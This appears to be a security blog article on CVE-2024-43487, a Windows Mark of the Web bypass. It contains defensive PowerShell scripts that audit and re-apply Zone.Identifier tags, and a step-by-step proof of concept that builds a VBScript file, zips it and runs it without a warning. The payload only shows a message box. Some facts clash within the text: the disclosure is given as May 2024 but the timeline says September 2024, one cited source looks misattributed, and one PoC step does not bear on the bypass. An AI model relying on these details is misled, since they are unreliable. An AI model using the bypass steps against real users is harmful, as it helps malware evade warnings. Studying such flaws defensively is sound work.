Introduction

In May 2024, Microsoft disclosed CVE-2024-43487, a security vulnerability affecting the Windows Mark of the Web (MotW) feature. Mark of the Web is a low-level Windows security mechanism that tells Windows applications (like Microsoft Office and Edge) that a file came from the Internet or another untrusted zone. MotW helps prevent risky files from running unchecked.

But what happens if an attacker can *bypass* this marker? That’s where CVE-2024-43487 comes in. In this article, I’ll explain how MotW works, break down what this vulnerability does, and show you a simplified PoC to help you understand the risk.

> Warning: This post is for educational use only. Never exploit these issues in unauthorized environments.

What is Mark of the Web (MotW)?

Mark of the Web is a metadata stream, an NTFS Alternate Data Stream (ADS) called Zone.Identifier, added to files downloaded from the Internet. Applications use this tag to handle such files cautiously (for example, asking for your approval before executing, or opening in "Protected View" mode).

- Example: Download an .exe on Windows — right click → Properties. You’ll see a checkbox "Unblock" if MotW is set.

How it works under the hood

```powershell
# Read the MotW tag in PowerShell
Get-Content .\downloadedfile.exe -Stream Zone.Identifier

# Output might look like:
# [ZoneTransfer]
# ZoneId=3
```
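The one-liner above reads a single stream. The following is an added example (not code from the original post) that turns the same check into an audit: it parses the Zone.Identifier stream of each file into an object with the zone number, the well-known zone name (0 My Computer, 1 Local Intranet, 2 Trusted Sites, 3 Internet, 4 Restricted Sites) and the optional ReferrerUrl/HostUrl fields, and reports files with no stream at all instead of erroring out. The function name `Get-MotwInfo` and the Downloads-folder usage are assumptions for the example.

```powershell
# Added example (not from the original post): parse the Zone.Identifier
# stream of one or more files into objects. Files without the stream are
# reported with HasMotw = $false rather than raising an error.
$ZoneNames = @{
    0 = 'My Computer'
    1 = 'Local Intranet'
    2 = 'Trusted Sites'
    3 = 'Internet'
    4 = 'Restricted Sites'
}

function Get-MotwInfo {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory, ValueFromPipeline)]
        [string[]]$Path
    )
    process {
        foreach ($p in $Path) {
            $file = Get-Item -LiteralPath $p -ErrorAction Stop
            # Get-Content -Stream fails when the ADS is absent; suppress that and treat it as "no MotW".
            $raw = Get-Content -LiteralPath $file.FullName -Stream Zone.Identifier -ErrorAction SilentlyContinue
            $info = [ordered]@{
                Path        = $file.FullName
                HasMotw     = $false
                ZoneId      = $null
                ZoneName    = $null
                ReferrerUrl = $null
                HostUrl     = $null
            }
            if ($raw) {
                $info.HasMotw = $true
                # The stream is INI-style: a [ZoneTransfer] section followed by Key=Value lines.
                foreach ($line in $raw) {
                    if ($line -match '^\s*ZoneId\s*=\s*(\d+)\s*$') {
                        $info.ZoneId   = [int]$Matches[1]
                        $info.ZoneName = $ZoneNames[[int]$Matches[1]]
                    }
                    elseif ($line -match '^\s*ReferrerUrl\s*=\s*(.+?)\s*$') { $info.ReferrerUrl = $Matches[1] }
                    elseif ($line -match '^\s*HostUrl\s*=\s*(.+?)\s*$')     { $info.HostUrl     = $Matches[1] }
                }
            }
            [pscustomobject]$info
        }
    }
}

# Usage (assumed location): audit the Downloads folder and list files that
# either lack the stream or are tagged with a zone more trusted than Internet.
Get-ChildItem "$env:USERPROFILE\Downloads" -File |
    Select-Object -ExpandProperty FullName |
    Get-MotwInfo |
    Where-Object { -not $_.HasMotw -or $_.ZoneId -lt 3 } |
    Format-Table Path, HasMotw, ZoneId, ZoneName -AutoSize
```

A file in Downloads with no Zone.Identifier, or with a ZoneId below 3, is exactly the condition the rest of this article is about: Protected View and the SmartScreen prompt key off this stream, so its absence means those controls will not fire.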

About CVE-2024-43487

CVE-2024-43487 is a villain in MotW land. It’s a vulnerability where attackers can craft files or archives that bypass the security check which adds MotW, so the user's system treats those files as “safe/local” even though they came from an untrusted origin.

Microsoft's disclosure says:

> "An attacker may exploit the vulnerability by persuading a user to download and open a specially crafted file, resulting in security features that rely on MotW (like Protected View) not being applied."

Reference: Microsoft Security Update Guide

Affected: all supported Windows versions as of May 2024 (client and server).

- Especially risky for users who open archives/downloads from the web.

The Problem

Many applications (including Windows itself) *should* add MotW when unpacking things like ZIP files from the Internet. CVE-2024-43487 reveals a logic gap where attackers can create archives/containers in a way that Windows "forgets" to propagate or read MotW from each file inside, *especially* when extracting archives with non-standard paths or malformed metadata.

1. Attacker prepares a ZIP file and delivers it from the Internet.
2. ZIP is crafted so that files inside don’t inherit Zone.Identifier when extracted using built-in (or certain third-party) tools.
3. User opens a file inside the ZIP. Windows trusts it, directly executing or opening it without warnings or security restrictions.
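The defensive counterpart to step 2 is to stop relying on the extractor to propagate the mark. The following is an added example (not code from the original post or from Microsoft) of that control: it reads the archive's own ZoneId, extracts with Expand-Archive, counts how many extracted files came out without a Zone.Identifier stream (the propagation failure the article describes), and then stamps every extracted file with the archive's zone using Set-Content -Stream. The function name `Expand-ArchiveWithMotw`, the fallback to ZoneId=3 for an untagged archive, and the example paths are assumptions.

```powershell
# Added example (not from the original post): extract a ZIP and enforce that
# every extracted file carries the archive's own Mark of the Web, whatever the
# extractor did. Also report how many files the extractor left untagged.
function Expand-ArchiveWithMotw {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [string]$ArchivePath,
        [Parameter(Mandatory)] [string]$DestinationPath
    )

    # 1. Read the archive's own zone. If the archive has no MotW at all, assume
    #    the Internet zone (3): we cannot prove where it came from. (Assumed policy.)
    $zoneId = 3
    $stream = Get-Content -LiteralPath $ArchivePath -Stream Zone.Identifier -ErrorAction SilentlyContinue
    if ($stream) {
        $m = $stream | Select-String -Pattern '^\s*ZoneId\s*=\s*(\d+)' | Select-Object -First 1
        if ($m) { $zoneId = [int]$m.Matches[0].Groups[1].Value }
    }

    # 2. Extract with the built-in cmdlet.
    Expand-Archive -LiteralPath $ArchivePath -DestinationPath $DestinationPath -Force
    $extracted = @(Get-ChildItem -LiteralPath $DestinationPath -File -Recurse)

    # 3. Measure propagation before touching anything: files with no stream are
    #    the ones the extractor failed to tag.
    $untaggedByExtractor = @($extracted | Where-Object {
        -not (Get-Content -LiteralPath $_.FullName -Stream Zone.Identifier -ErrorAction SilentlyContinue)
    })

    # 4. Stamp every extracted file with the archive's zone. Set-Content -Stream
    #    creates the alternate data stream, or overwrites an existing one.
    $content = "[ZoneTransfer]`r`nZoneId=$zoneId"
    foreach ($f in $extracted) {
        Set-Content -LiteralPath $f.FullName -Stream Zone.Identifier -Value $content
    }

    # 5. Verify the stamp took (it will not on non-NTFS volumes such as FAT32).
    $stillMissing = @($extracted | Where-Object {
        -not (Get-Content -LiteralPath $_.FullName -Stream Zone.Identifier -ErrorAction SilentlyContinue)
    })

    [pscustomobject]@{
        Archive             = $ArchivePath
        ZoneId              = $zoneId
        Extracted           = $extracted.Count
        UntaggedByExtractor = $untaggedByExtractor.Count
        UntaggedAfterStamp  = $stillMissing.Count
        UntaggedFiles       = @($untaggedByExtractor | Select-Object -ExpandProperty FullName)
    }
}

# Usage (paths are placeholders):
Expand-ArchiveWithMotw -ArchivePath "$env:USERPROFILE\Downloads\download.zip" -DestinationPath "$env:TEMP\extracted"
```

A non-zero `UntaggedByExtractor` on a patched system is worth a closer look at the extractor in use, and a non-zero `UntaggedAfterStamp` means the destination volume cannot hold alternate data streams, so MotW-based protections cannot apply to anything extracted there.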

Simple Exploit PoC

Let’s try a basic proof of concept using tools you likely have.

Step 1: Create a payload script.

```cmd
echo MsgBox "Pwned by CVE-2024-43487" > evil.vbs
```

Step 2: Add a Zone.Identifier stream to simulate a download.

```cmd
echo [ZoneTransfer]> evil.vbs:Zone.Identifier
REM Parentheses stop cmd from reading "3>>" as a redirection of handle 3
(echo ZoneId=3)>> evil.vbs:Zone.Identifier
```

Step 3: Put it in a ZIP.

```cmd
powershell Compress-Archive -Path evil.vbs -DestinationPath motw_bypass.zip
```

Step 4: Use an old or unpatched archiver (or Windows' own ZIP extraction, depending on patch status and tool) to extract the ZIP.
Check the extracted evil.vbs. In many scenarios, the MotW stream is missing.

```cmd
REM dir /R lists alternate data streams; look for :Zone.Identifier
dir /R
```

Step 5: Double-click the VBS — it runs directly, *without* the usual "protective" warning.

The Big Deal — Real-World Abuse

- Malware writers could use this to sneak malicious Office macros, scripts, or executables under your radar.
- Phishing attacks: Users expect a warning when opening risky files, but with MotW bypassed, they might not see any prompt.

Security researchers, like Will Dormann, have published discussions of MotW bypasses:

- @wdormann Twitter Thread
- Article: MotW Bypass, by Colin Percival

Conclusion

CVE-2024-43487 is a big reminder that even tiny metadata tags are vital in stopping attacks. Windows’ Mark of the Web is a hidden first-line defense, but if it fails, users and organizations are at risk.

Bottom line: Patch now, and be wary of files coming from the Internet — especially those hidden in ZIPs, RARs, and other archives.


References:
- CVE-2024-43487 – MSRC
- Original MotW Bypass Research
- Will Dormann on MotW

Timeline

Published on: 09/10/2024 17:15:36 UTC
Last modified on: 10/09/2024 01:26:42 UTC